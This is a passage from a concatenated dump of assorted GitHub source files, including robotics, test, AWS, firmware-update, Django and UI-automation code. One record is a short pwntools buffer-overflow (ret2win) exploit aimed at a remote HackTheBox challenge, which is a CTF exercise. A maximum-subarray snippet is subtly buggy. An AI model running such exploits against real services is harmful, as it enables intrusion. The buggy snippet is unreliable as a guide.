rbd.Joint(rbd.Joint.Rev, e.Vector3d.UnitX(), True, 0, \"j0\")\n j1 = rbd.Joint(rbd.Joint.Rev, e.Vector3d.UnitY(), True, 1, \"j1\")\n j2 = rbd.Joint(rbd.Joint.Rev, e.Vector3d.UnitZ(), True, 2, \"j2\")\n j3 = rbd.Joint(rbd.Joint.Spherical, True, 3, \"j3\")\n j4 = rbd.Joint(rbd.Joint.Prism, e.Vector3d.UnitY(), True, 4, \"j4\")\n\n mbg.addJoint(j0)\n mbg.addJoint(j1)\n mbg.addJoint(j2)\n mbg.addJoint(j3)\n mbg.addJoint(j4)\n\n to = sva.PTransformd(e.Vector3d(0., 0.5, 0.))\n fro = sva.PTransformd.Identity()\n\n mbg.linkBodies(0, to, 1, fro, 0)\n mbg.linkBodies(1, to, 2, fro, 1)\n mbg.linkBodies(2, to, 3, fro, 2)\n mbg.linkBodies(1, sva.PTransformd(e.Vector3d(0.5, 0., 0.)),\n 4, fro, 3)\n mbg.linkBodies(3, to, 5, fro, 4)\n\n mb = mbg.makeMultiBody(0, True)\n mbc = rbd.MultiBodyConfig(mb)\n mbc.zero(mb)\n\n return mbg, mb, mbc\n","repo_name":"jrl-umi3218/sva_rbdyn_tutorials","sub_path":"robots/tutorial_tree.py","file_name":"tutorial_tree.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"31"} +{"seq_id":"20637855610","text":"\"\"\" Tests for josephus.py \"\"\"\n\nimport os\nimport re\nimport random\nfrom subprocess import getstatusoutput\n\nPRG = './josephus.py'\n\n\n# --------------------------------------------------\ndef test_exists():\n \"\"\" Program exists \"\"\"\n\n assert os.path.isfile(PRG)\n\n\n# --------------------------------------------------\ndef test_usage():\n \"\"\" Prints usage \"\"\"\n\n for flag in ['-h', '--help']:\n rv, out = getstatusoutput(f'{PRG} {flag}')\n assert rv == 0\n assert re.match(\"usage\", out, re.IGNORECASE)\n\n\n# --------------------------------------------------\ndef test_bad_n():\n \"\"\" Dies on bad N \"\"\"\n\n bad = random.choice(range(-10, 1))\n ok = random.choice(range(3, 10))\n rv, out = getstatusoutput(f'{PRG} -n {bad} -k {ok}')\n assert rv != 0\n assert re.match(\"usage\", out, re.IGNORECASE)\n assert re.search(f'-n \"{bad}\" must be > 0', out)\n\n\n# --------------------------------------------------\ndef test_bad_k():\n \"\"\" Dies on bad K \"\"\"\n\n bad = random.choice(range(-10, 1))\n ok = random.choice(range(3, 10))\n rv, out = getstatusoutput(f'{PRG} -k {bad} -n {ok}')\n assert rv != 0\n assert re.match(\"usage\", out, re.IGNORECASE)\n assert re.search(f'-k \"{bad}\" must be > 0', out)\n\n\n# --------------------------------------------------\ndef test_defaults():\n \"\"\" Runs OK with defaults \"\"\"\n\n rv, out = getstatusoutput(f'{PRG}')\n assert out == f'n = 10, k = 3, answer = 4'\n\n\n# --------------------------------------------------\ndef test_args1():\n \"\"\" Runs OK with arguments \"\"\"\n\n rv, out = getstatusoutput(f'{PRG} -n 64 -k 17')\n assert out == f'n = 64, k = 17, answer = 13'\n\n\n# --------------------------------------------------\ndef test_args2():\n \"\"\" Runs OK with arguments \"\"\"\n\n rv, out = getstatusoutput(f'{PRG} -k 12 -n 67')\n assert out == f'n = 67, k = 12, answer = 16'\n","repo_name":"kyclark/josephus","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72944723609","text":"# 53. Maximum Subarray\n#nums = [-2,1,-3,4,-1,2,1,-5,4]\n# Output: 6\n\n#nums = [1]\n# Output: 1\n\n#nums = [-2,1]\n# Output: 1\n\n#nums = [-2,-1]\n# Output: 1\n\ncurSum = 0\nmaxSum = -1\n \nfor i in range(len(nums)):\n if curSum < 0: curSum = 0\n curSum += nums[i]\n maxSum = max(curSum,maxSum)\n\nprint(maxSum)","repo_name":"algohell/ALGOHELL","sub_path":"53/pgo_53.py","file_name":"pgo_53.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"15724341869","text":"import PyPDF2\nfrom PIL import Image, ExifTags\nimport io\nimport xml.etree.cElementTree as ET\nimport os\n# for printing the table\nfrom tabulate import tabulate\n# HTML Report\nfrom xml.dom.minidom import getDOMImplementation, Document\n# CSV Report\nimport csv\n\nclass PDFLC():\n def __init__(self,filename,saveimages=False):\n \"\"\"Instantiate a PDFlicenseschecker object.\n\n Args:\n filename (str): The name of the PDF file or its path.\n saveimages (bool, optional): If True the images of the PDF file will\n be exported into a folder in the same directory of the file. Defaults to False.\n\n Returns:\n Tuple: A list with all the metadata of the images and a dict with the metadata of the PDF.\n \"\"\"\n super().__init__()\n self.filename = filename\n self.PDFmetadata = None\n self.imagesmetadata = None \n self.foldername = filename.split(\".\")[0]\n self.header = [\"pagenumber\", \"image.name\", \"width\", \"height\", \"xmp\",\n \"iptcrights\", \"creatorstxt\", \"exif\", \"exifrights\", \"exifartist\"]\n self.saveimages = saveimages\n self.imagesXMPXML = dict()\n self.readPDF(filename=filename)\n\n\n def readPDF(self,filename=None,saveimages=False):\n \"\"\"Read the PDF and generate a list of the metadata.\n\n Args:\n filename (str): The path of the PDF file.\n\n Returns:\n list : a list of list with the image matadata\n meta : the PDF document metadata\n \"\"\"\n if filename is None:\n if self.filename is None:\n raise ValueError(\"Provide a valid filename.\")\n filename = self.filename\n # in case the images were not saved before\n self.saveimages = True if saveimages else self.saveimages\n if self.saveimages and not os.path.exists(self.foldername):\n os.mkdir(self.foldername)\n reader = PyPDF2.PdfReader(filename)\n # read the metadata of the PDF file.\n meta = reader.metadata\n table = []\n for pagenum, page in enumerate(reader.pages, 1):\n try:\n for image in page.images:\n imageID = \"-\".join(map(str, (pagenum, image.name)))\n xmp = False\n exif = False\n iptcrights = None\n exifrights = None\n creators_txt = None\n exifartist = None\n creators_joined = None\n # find the begining and the end of the xpacket.\n begin = image.data.find(b\" self.y_website_bottom:\n self.mouse_.scroll(0, -1)\n self.y_website_top += 53\n self.y_website_bottom += 53\n time.sleep(random.uniform(0.0077, 0.1385))\n element_y = element.rect['y']\n \n while element_y < self.y_website_top:\n self.mouse_.scroll(0, 1)\n self.y_website_top -= (53 if self.y_website_top > 0 else 0)\n self.y_website_bottom -= (53 if self.y_website_bottom > self.y_website_bottom_lim else 0)\n time.sleep(random.uniform(0.0077, 0.1385)) #Параметры установлены на основании статистики по скролингу пользователя.\n\n point_on_element_x = element_x + random.randint(int(element.rect['width'] * 0.2), \n int(element.rect['width'] * 0.7))\n\n point_on_element_y = self.y_screen_bottom - (self.y_website_bottom - element_y) + random.randint(int(element.rect['height'] * 0.2), int(element.rect['height'] * 0.8))\n\n return point_on_element_x, point_on_element_y\n \n\n def bezier_path(self, x1, y1, x2, y2):\n \"\"\"Функция возвращает список координат точек для построения пути указателя мыши\n до целеовой координаты на экране\n\n :param x1: координата по оси ОХ текущей позиции указателя мыши\n :param y1: координата по оси ОY текущей позиции указателя мыши\n :param x2: координата по оси ОХ целевой точки для указателя мыши\n :param y2: координата по оси ОY целевой точки для указателя мыши\n :return: список координат точек\n \"\"\"\n \n k = (y1 - y2) / (x1 - x2)\n b = y2 - k * x2\n\n x_delta = x2 - x1\n y_delta = y2 - y1\n\n up_down_direction = random.choice([-1, 1])\n\n x_inter_1 = x1 + int(x_delta * random.randrange(-15, 40, 3)/100)\n y_inter_1 = k * x_inter_1 + b + up_down_direction * int(y_delta * random.randrange(5, 25, 2) / 100)\n\n if math.fabs(x_delta) > 100:\n x_inter_2 = x1 + int(x_delta * random.randrange(80, 120, 3)/100)\n y_inter_2 = k * x_inter_2 + b + up_down_direction * (-1) * int(y_delta * random.randrange(5, 25, 2) / 100)\n else:\n x_inter_2 = x2\n y_inter_2 = y2\n\n nodes1 = np.asfortranarray([\n [x1, x_inter_1, x_inter_2 ,x2],\n [y1, y_inter_1, y_inter_2, y2],])\n\n curve1 = bezier.Curve(nodes1, degree=3)\n s_vals = np.linspace(0., 1., math.fabs(int(x2 - x1))) \n points = curve1.evaluate_multi(s_vals)\n points = points.astype(int)\n\n return points\n\n def mouse_click_left(self):\n \"\"\"Функция иммитирует нажатие левой кнопки мыши и ничего не возвращает\n \"\"\"\n\n self.mouse_.press(Button.left)\n time.sleep(random.uniform(0.0578, 0.1129)) #Значения установлены на основани статистической информации о скорости клика пользователя\n self.mouse_.release(Button.left)\n\n def mouse_move_to(self, element):\n \"\"\" Функция перемещает курсор мыши от текущей позиции нв экране до целевого элемента на сранице\n :param element: WebElement а который необходимо навести указатель мыши\n :return: None\n \"\"\"\n element_destination = self.in_focus(element)\n\n # Строим путь до элемента из точек:\n track_to_element = self.bezier_path(self.mouse_.position[0], \n self.mouse_.position[1], \n element_destination[0], \n element_destination[1])\n \n speed_OX_1 = [(0.18, 0,22), (0.012, 0.017), (0.003, 0.005), (0.0030, 0.0070), (0.0035, 0.0055)]\n speed_OX_2 = [(0.05, 0.19), (0.016, 0.030), (0.016, 0.047),\t(0.0108, 0.0211), (0.0044, 0.0082)]\n\n distance_OX = math.fabs(element_destination[0] - self.mouse_.position[0])\n distance_OY = math.fabs(element_destination[1] - self.mouse_.position[1])\n\n if distance_OX >= distance_OY:\n speed_choice = speed_OX_1\n else:\n speed_choice = speed_OX_2\n\n if distance_OX <= 20:\n point_interval = speed_choice[0]\n elif 20 < distance_OX <= 50:\n point_interval = speed_choice[1]\n elif 50 < distance_OX <= 100:\n point_interval = speed_choice[2]\n elif 100 < distance_OX <= 300:\n point_interval = speed_choice[3]\n elif distance_OX > 300:\n point_interval = speed_choice[4] \n\n for i in range(len(track_to_element[0])):\n self.mouse_.position = (track_to_element[0][i], track_to_element[1][i])\n time.sleep(random.uniform(point_interval[0], point_interval[1]))\n \n time.sleep(0.4)\n\n def mouse_scroll(self, direction):\n \"\"\"Функция осуществляет одно прокручивание колеса мыши по заданному направлению вверз/вниз\n\n :param direction: для вижения вниз задаем -1 / для движения вверх задаем \"1\" \n :return: None\n \"\"\"\n self.mouse_.scroll(0, direction)\n time.sleep(random.uniform(0.0077, 0.1385))\n","repo_name":"menshikoff/VKR_MDA_2020","sub_path":"regrid.py","file_name":"regrid.py","file_ext":"py","file_size_in_byte":8742,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"69948612889","text":"import time\nimport datetime\nimport logging\nfrom imcsdk.imcgenutils import *\nfrom imcsdk.imccoreutils import IMC_PLATFORM, get_server_dn\nfrom imcsdk.mometa.huu.HuuFirmwareUpdater import HuuFirmwareUpdater, \\\n HuuFirmwareUpdaterConsts\nfrom imcsdk.mometa.huu.HuuFirmwareUpdateStatus import HuuFirmwareUpdateStatus\nfrom imcsdk.mometa.top.TopSystem import TopSystem\nfrom imcsdk.mometa.huu.HuuController import HuuController\n\nlog = logging.getLogger('imc')\n\ndef firmware_huu_update(handle, remote_share, share_type, remote_ip,\n username=\"\", password=\"\", update_component=\"all\",\n stop_on_error=\"yes\", timeout=240,\n verify_update=\"yes\", cimc_secure_boot=\"no\",\n server_id=1):\n \"\"\"\n This method can be used to upgrade the cimc firmware\n\n Args:\n handle (ImcHandle)\n remote_share (string): Full path to the firmware file\n share_type (string): \"nfs\", \"www\", \"cifs\"\n remote_ip (string): IP address of the remote machine\n username (string): username\n password (string): password\n update_component (string): component to be updated.\n \"all\" for upgrading all components\n Refer release notes for individual component names\n stop_on_error (string): \"yes\", \"no\"\n timeout (int): Timeout value. Range is 30-240 mins.\n verify_update (string): \"yes\", \"no\"\n cimc_secure_boot (string): \"yes\", \"no\"\n server_id (int): Server id for which firmware is performed.\n This is relevant to C3260 platforms.\n\n Returns:\n HuuFirmwareUpdater object\n\n Examples:\n firmware_huu_update(handle=handle,\n remote_ip=ip,\n remote_share='nfsshare2/ucs-c460m4-huu-2.0.9l.iso',\n share_type='nfs',\n username=username,\n password=password,\n update_component='all',\n stop_on_error='yes',\n verify_update='no',\n cimc_secure_boot='no',\n timeout=60)\n \"\"\"\n\n top_system = TopSystem()\n if handle.platform == IMC_PLATFORM.TYPE_CLASSIC:\n parent_dn = top_system.dn\n elif handle.platform == IMC_PLATFORM.TYPE_MODULAR:\n parent_dn = get_server_dn(handle, str(server_id))\n\n huu = HuuController(parent_mo_or_dn=parent_dn)\n\n huu_firmware_updater = HuuFirmwareUpdater(\n parent_mo_or_dn=huu,\n remote_share=remote_share,\n map_type=share_type,\n remote_ip=remote_ip,\n username=username,\n password=password,\n update_component=update_component,\n admin_state=HuuFirmwareUpdaterConsts.ADMIN_STATE_TRIGGER,\n stop_on_error=stop_on_error,\n time_out=str(timeout),\n verify_update=verify_update,\n cimc_secure_boot=cimc_secure_boot)\n handle.add_mo(huu_firmware_updater)\n return huu_firmware_updater\n\n\ndef log_progress(msg=\"\", status=\"\"):\n log.info(\"%s: %s. %s\" % (datetime.datetime.now(), msg, status))\n\n\ndef _has_upgrade_started(update):\n return update.update_start_time == \"\" and update.update_end_time == \"\"\n\n\n# Tracks if upgrade is over, not necessarily successful\ndef _has_upgrade_finished(update):\n return update.update_end_time != \"NA\"\n\n\ndef _print_component_upgrade_summary(handle):\n update_objs = handle.query_classid(\"HuuUpdateComponentStatus\")\n log.info(\"Component Update Summary:-\")\n for obj in update_objs:\n log.info(\"%20s: %s\" % (obj.component, obj.update_status))\n\n\ndef firmware_huu_update_monitor(handle, timeout=60, interval=10, server_id=1):\n \"\"\"\n This method monitors status of a firmware upgrade.\n\n Args:\n handle(ImcHandle)\n timeout(int): Timeout in minutes for monitor API.\n interval(int): frequency of monitoring in seconds\n server_id(int): Server id for monitoring firmware upgrade\n\n Returns:\n None\n\n Examples:\n firmware_huu_update_monitor(handle, 60, 10)\n \"\"\"\n current_status = []\n start = datetime.datetime.now()\n\n top_system = TopSystem()\n if handle.platform == IMC_PLATFORM.TYPE_CLASSIC:\n parent_dn = top_system.dn\n elif handle.platform == IMC_PLATFORM.TYPE_MODULAR:\n parent_dn = get_server_dn(handle, str(server_id))\n\n huu = HuuController(parent_mo_or_dn=parent_dn)\n huu_firmware_updater = HuuFirmwareUpdater(parent_mo_or_dn=huu.dn)\n update_obj = HuuFirmwareUpdateStatus(\n parent_mo_or_dn=huu_firmware_updater.dn)\n\n while True:\n try:\n update_obj = handle.query_dn(update_obj.dn)\n if _has_upgrade_started(update_obj):\n log_progress(\"Firmware upgrade is yet to start\")\n\n if _has_upgrade_finished(update_obj):\n log_progress(\"Firmware upgrade has finished\",\n update_obj.overall_status)\n _print_component_upgrade_summary(handle)\n break\n elif update_obj.overall_status not in current_status:\n log_progress(\"Firmware Upgrade is still running\",\n update_obj.overall_status)\n current_status.append(update_obj.overall_status)\n\n time.sleep(interval)\n secs = (datetime.datetime.now() - start).total_seconds()\n if int(secs / 60) > timeout:\n log_progress(\"Monitor API timeout\",\n \"rerun firmware_huu_update_monitor\")\n break\n except:\n _validate_connection(handle)\n\n\ndef _validate_connection(handle, timeout=15 * 60):\n \"\"\"\n Monitors IMC connection, if connection exists return True, else False\n Args:\n handle (ImcHandle)\n timeout (number): timeout in seconds\n Returns:\n True/False(bool)\n Raises:\n Exception if unable to connect to IMC\n \"\"\"\n\n connected = False\n start = datetime.datetime.now()\n while not connected:\n try:\n # If the session is already established,\n # this will validate the session\n connected = handle.login()\n except Exception as e:\n # IMC may been in the middle of activation,\n # hence connection would fail\n log.debug(\"Login to IMC failed: %s\", str(e))\n\n if not connected:\n try:\n log.debug(\"Login to IMC, elapsed time %ds\",\n (datetime.datetime.now() - start).total_seconds())\n handle.login(force=True)\n log.debug(\"Login successful\")\n connected = True\n except:\n log.debug(\"Login failed. Sleeping for 60 seconds\")\n time.sleep(60)\n if (datetime.datetime.now() - start).total_seconds() > timeout:\n raise Exception(\"TimeOut: Unable to login to IMC\")\n return connected\n","repo_name":"dumpofmemory/imc_handle","sub_path":"venv/lib/python2.7/site-packages/imcsdk/utils/imcfirmwareinstall.py","file_name":"imcfirmwareinstall.py","file_ext":"py","file_size_in_byte":6999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"20599509662","text":"from django.urls import path\nfrom .views import HomePageView, SearchResultsView, SearchContainer, SearchAlphabet, register_request, login_request, \\\n logout_request, AboutUs, CommentsView\n\n\nurlpatterns = [\n path(\"\", HomePageView.as_view(), name=\"home\"),\n path(\"search-container/\", SearchContainer.as_view(), name=\"search_container\"),\n path(\"search-results/\", SearchResultsView.as_view(), name=\"search_results\"),\n path(\"search-alphabet/\", SearchAlphabet.as_view(), name=\"search_alphabet\"),\n path(\"about_us\", AboutUs.as_view(), name=\"about_us\"),\n path(\"register\", register_request, name=\"register\"),\n path(\"login\", login_request, name=\"login\"),\n path(\"logout\", logout_request, name=\"logout\"),\n\n path(\"comments/\", CommentsView.as_view(), name=\"comments\")\n\n]\n","repo_name":"oksanastep/My_beetroot_project","sub_path":"project/myproject/waste_sorting/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"16064070132","text":"from pwn import *\nimport os\n\nos.system('clear')\ncontext.log_level = 'debug'\nsh = remote('206.189.28.76',30687)\np = b'A' * 56\nwinAddr = 4198918 #0x401206\np += p64(winAddr)\nsh.sendlineafter(b': ', p)\nsh.interactive()\n","repo_name":"jon-brandy/hackthebox","sub_path":"Categories/Pwn/Reg/ret2win.py","file_name":"ret2win.py","file_ext":"py","file_size_in_byte":215,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"31"} +{"seq_id":"34309097351","text":"import boto3\nimport calendar\nimport gzip\nimport json\nimport time\nimport sys\n\nfrom datetime import timezone\n\n\nclient = boto3.client('kinesis')\n\n\ndef parse_timestamp(value):\n for fmt in [\"%Y-%m-%dT%H:%M:%S\", \"%Y-%m-%d %H:%M:%S\"]:\n try:\n return calendar.timegm(time.strptime(value, fmt))\n except ValueError:\n pass\n try:\n return float(value)\n except:\n raise ValueError(f\"invalid timestamp: {value}\")\n\n\ndef retrieve_shards(stream_name):\n \"\"\" Retrieves information about all shards for the specified stream.\n \"\"\"\n result = []\n paginator = client.get_paginator('describe_stream')\n for page in paginator.paginate(StreamName=stream_name):\n result += page['StreamDescription']['Shards']\n return result\n\n\ndef retrieve_shard_iterators(stream_name, shards, iterator_type, timestamp=None):\n \"\"\" Returns a map of shard ID to iterator.\n \"\"\"\n result = {}\n for shard in shards:\n shard_id = shard['ShardId']\n if timestamp:\n resp = client.get_shard_iterator(StreamName=stream_name, ShardId=shard_id, ShardIteratorType=iterator_type, Timestamp=timestamp)\n else:\n resp = client.get_shard_iterator(StreamName=stream_name, ShardId=shard_id, ShardIteratorType=iterator_type)\n result[shard_id] = resp['ShardIterator']\n return result\n\n\ndef retrieve_records(iterators):\n \"\"\" Retrieves all records for the provided iterator map, updating the map with new iterators.\n \"\"\"\n result = []\n for shard_id, itx in iterators.items():\n resp = client.get_records(ShardIterator=itx)\n for rec in resp['Records']:\n data = rec['Data']\n if data.startswith(b'\\x1f\\x8b'):\n data = gzip.decompress(data)\n result.append({\n 'SequenceNumber': rec['SequenceNumber'],\n 'ApproximateArrivalTimestamp': rec['ApproximateArrivalTimestamp'].astimezone(timezone.utc).isoformat(),\n 'Data': data.decode('utf-8'),\n 'PartitionKey': rec['PartitionKey']\n })\n iterators[shard_id] = resp['NextShardIterator']\n return result\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 2 or len(sys.argv) > 5:\n print(__doc__)\n sys.exit(1)\n\n stream_name = sys.argv[1]\n iterator_type = sys.argv[2] if len(sys.argv) > 2 else 'LATEST'\n timestamp = parse_timestamp(sys.argv.pop(3)) if iterator_type == 'AT_TIMESTAMP' else None\n poll_interval = int(sys.argv[3]) if len(sys.argv) > 3 else 10\n\n shards = retrieve_shards(stream_name)\n iterators = retrieve_shard_iterators(stream_name, shards, iterator_type, timestamp)\n while True:\n for rec in retrieve_records(iterators):\n print(json.dumps(rec))\n time.sleep(poll_interval)\n","repo_name":"kdgregory/aws-misc","sub_path":"utils/kinesis_reader.py","file_name":"kinesis_reader.py","file_ext":"py","file_size_in_byte":2860,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"31"} +{"seq_id":"19424514966","text":"#!/usr/bin/env python3\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n\nfrom gi.repository import GObject\n\nimport xdg.BaseDirectory\nimport svgwrite\nimport os\n\nDATA_PATH = os.path.join(xdg.BaseDirectory.xdg_data_home, 'tuhigui')\n\n\nclass JsonSvg(GObject.Object):\n def __init__(self, json, orientation, *args, **kwargs):\n self.json = json\n try:\n os.mkdir(DATA_PATH)\n except FileExistsError:\n pass\n\n self.timestamp = json['timestamp']\n self.filename = os.path.join(DATA_PATH, f'{self.timestamp}.svg')\n self.orientation = orientation\n self._convert()\n\n def _convert(self):\n js = self.json\n dimensions = js['dimensions']\n if dimensions == [0, 0]:\n width, height = 100, 100\n else:\n # Original dimensions are too big for SVG Standard\n # so we normalize them\n width, height = dimensions[0] / 100, dimensions[1] / 100\n\n if self.orientation in ['portrait', 'reverse-Portrait']:\n size = (height, width)\n else:\n size = (width, height)\n svg = svgwrite.Drawing(filename=self.filename, size=size)\n g = svgwrite.container.Group(id='layer0')\n for stroke_num, s in enumerate(js['strokes']):\n\n points_with_sk_width = []\n\n for p in s['points']:\n\n x, y = p['position']\n # Normalize coordinates too\n x, y = x / 100, y / 100\n\n if self.orientation == 'reverse-portrait':\n x, y = y, width - x\n elif self.orientation == 'portrait':\n x, y = height - y, x\n elif self.orientation == 'reverse-landscape':\n x, y = width - x, height - y\n\n delta = (p['pressure'] - 1000.0) / 1000.0\n stroke_width = 0.4 + 0.20 * delta\n points_with_sk_width.append((x, y, stroke_width))\n\n lines = svgwrite.container.Group(id=f'strokes_{stroke_num}', stroke='black')\n for i, (x, y, stroke_width) in enumerate(points_with_sk_width):\n if i != 0:\n xp, yp, stroke_width_p = points_with_sk_width[i - 1]\n lines.add(\n svg.line(\n start=(xp, yp),\n end=(x, y),\n stroke_width=stroke_width,\n style='fill:none'\n )\n )\n g.add(lines)\n\n svg.add(g)\n svg.save()\n","repo_name":"whot/tuhigui","sub_path":"tuhigui/svg.py","file_name":"svg.py","file_ext":"py","file_size_in_byte":3038,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"4840219806","text":"# # Challenge 1\n# # Ask the user for a number and a length.\n# num = int(input('give me a Number'));\n# length = int(input('give me a length too'));\n#\n# # probabvly would be good if the inputs arent texts before we turn them to\n# # numbers or after we turn them to number\n# # Create a program that prints a list of multiples of the number until the list length reaches length.\n#\n# i = 1\n# multi_list = []\n# while i < length + 1:\n# multi_list.append(i*num);\n# i+=1\n#\n# print(multi_list)\n\n# Challenge 2\n# Write a program that asks a string to the user, and display a new string with any duplicate consecutive letters removed.\nrep_word = input('give me a word with consecutive letters')\nnew_word = []\nfor i in range(0,len(rep_word)):\n if len(new_word) == 0:\n new_word.append(rep_word[i])\n if rep_word[i] in new_word and rep_word[i] == new_word[-1]:\n continue\n else:\n new_word.append(rep_word[i])\n\nnew_word = ''.join(new_word)\nprint(new_word)\n\ndict = {\n 'value':'something',\n 'a_value': 'something else',\n \"b\" : '2'\n}\n\na,*s = dict.items()\nprint(s)\n\nsample_dict = {\n \"name\": \"Kelly\",\n \"age\":25,\n \"salary\": 8000,\n \"city\": \"New york\"\n\n}\nkeys_to_remove = [\"name\", \"salary\"]\n\nfor value in keys_to_remove:\n if value in sample_dict:\n sample_dict.pop(value)\n\nprint(sample_dict)","repo_name":"MiniManch/DI_Bootcamp","sub_path":"Week-6/Day-4/Daily-Challenge/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25926785657","text":"__authors__ = [\"Marcus Drobisch\"]\n__contact__ = \"roseguarden@fabba.space\"\n__credits__ = []\n__license__ = \"GPLv3\"\n\nimport json\n\n\nclass RegisterNodeStartup:\n def __init__(self, action_id=1):\n self.action = \"registerNodeStartup\"\n self.actionid = action_id\n self.version = \"1.0.0\"\n\n def to_json(self):\n return json.dumps(self, default=lambda o: o.__dict__)\n\n\nclass RequestUserAccess:\n def __init__(self, auth_key, action_id=1):\n self.action = \"requestUserAccess\"\n self.actionid = action_id\n self.version = \"1.0.0\"\n self.auth_key = auth_key\n\n def to_json(self):\n return json.dumps(self, default=lambda o: o.__dict__)\n","repo_name":"konglomerat/roseguarden","sub_path":"backend/tests/requests/nodeActions.py","file_name":"nodeActions.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8524782922","text":"#!/usr/bin/env python3\n\nimport glob\nimport json \nimport os\n\nclass SnippetDocumentor():\n\n def __init__(self):\n self.source = []\n self.docs = []\n self.content = []\n\n def assemble_content(self, output_path):\n for doc in self.docs:\n parts = doc.split('---')\n meta = json.loads(parts[1])\n self.content.append(parts[0])\n self.content.append('
    ')\n            for line_group in meta['lines']:\n                for line_index in range(line_group[0] - 1, line_group[1]):\n                    self.content.append(\n                        f\"{line_index + 1}  {self.source[line_index]}\"\n                    )\n            self.content.append('
    ')\n\n with open(output_path, 'w') as _out:\n _out.write(\"\\n\".join(self.content))\n\n def load_source(self, source_path):\n with open(source_path) as _source:\n self.source = _source.read().split(\"\\n\")\n\n def load_docs(self, docs_dir):\n local_file_list = [\n file for file in glob.glob(f\"{docs_dir}/*\")\n if os.path.isfile(file)\n ]\n local_file_list.sort()\n for local_file in local_file_list:\n with open(local_file) as _in:\n self.docs.append(_in.read())\n\nif __name__ == \"__main__\":\n working_dir = os.path.dirname(os.path.realpath(__file__))\n\n sd = SnippetDocumentor()\n sd.load_source(__file__)\n sd.load_docs(f\"{working_dir}/docs\")\n sd.assemble_content(f\"{working_dir}/DOCSCONTENT.html\")\n\n","repo_name":"alanwsmith/html-css-js.alanwsmith.com","sub_path":"site/recipes/live_code_codes_maker_experiment_alpha--2gxv4l6iyo7v/builder/src/PYTHON.py","file_name":"PYTHON.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6200601225","text":"import csbuild\n\nfrom .. import _shared_globals\nfrom .. import toolchain_gcc\nfrom ..plugin_plist_generator import *\n\n\nSCE_ORBIS_SDK_DIR = os.environ.get( \"SCE_ORBIS_SDK_DIR\", \"\" )\nSCE_ORBIS_SYSLIB_DIR = os.path.join( SCE_ORBIS_SDK_DIR, \"target\", \"lib\" )\n\n\nclass Ps4Base( object ):\n\tdef __init__( self ):\n\t\tpass\n\n\n\tdef GetValidArchitectures( self ):\n\t\treturn [\"x64\"]\n\n\n\tdef GetDefaultArchitecture(self):\n\t\treturn \"x64\"\n\n\n\tdef _copyTo( self, other ):\n\t\tpass\n\n\n\tdef _getSysRoot( self ):\n\t\t# PS4 does not set the sysroot.\n\t\treturn \"\"\n\n\n\tdef _getStandardLibraryArg( self, project ):\n\t\t# PS4 does not set the standard library.\n\t\treturn \"\"\n\n\nclass Ps4Compiler( Ps4Base, toolchain_gcc.GccCompiler ):\n\tdef __init__( self, shared ):\n\t\ttoolchain_gcc.GccCompiler.__init__( self, shared )\n\t\tPs4Base.__init__( self )\n\n\t\tself._settingsOverrides[\"cxx\"] = os.path.join( SCE_ORBIS_SDK_DIR, \"host_tools\", \"bin\", \"orbis-clang++.exe\" )\n\t\tself._settingsOverrides[\"cc\"] = os.path.join( SCE_ORBIS_SDK_DIR, \"host_tools\", \"bin\", \"orbis-clang.exe\" )\n\n\n\tdef copy(self, shared):\n\t\tret = toolchain_gcc.GccCompiler.copy( self, shared )\n\t\tPs4Base._copyTo( self, ret )\n\t\treturn ret\n\n\n\tdef _getIncludeDirs( self, includeDirs ):\n\t\t\"\"\"Returns a string containing all of the passed include directories, formatted to be passed to gcc/g++.\"\"\"\n\t\tret = \"\"\n\t\tfor inc in includeDirs:\n\t\t\tret += '-I\"{}\" '.format( os.path.abspath( inc ) )\n\t\tret += '-I\"{}\" -I\"{}\" '.format( os.path.join( SCE_ORBIS_SDK_DIR, \"target\", \"include\" ), os.path.join( SCE_ORBIS_SDK_DIR, \"target\", \"include_common\" ) )\n\t\treturn ret\n\n\n\tdef _getBaseCommand( self, compiler, project, isCpp ):\n\t\tret = toolchain_gcc.GccCompiler._getBaseCommand( self, compiler, project, isCpp )\n\t\tret = \"{}\".format( ret )\n\t\treturn ret\n\n\n\tdef SupportsObjectScraping(self):\n\t\treturn False\n\n\n\tdef GetObjectScraper(self):\n\t\treturn None\n\n\nclass Ps4Linker( Ps4Base, toolchain_gcc.GccLinker ):\n\tdef __init__( self, shared ):\n\t\ttoolchain_gcc.GccLinker.__init__( self, shared )\n\t\tPs4Base.__init__( self )\n\n\t\tself._ar = os.path.join( SCE_ORBIS_SDK_DIR, \"host_tools\", \"bin\", \"orbis-ar.exe\" )\n\n\t\tself._settingsOverrides[\"cxx\"] = os.path.join( SCE_ORBIS_SDK_DIR, \"host_tools\", \"bin\", 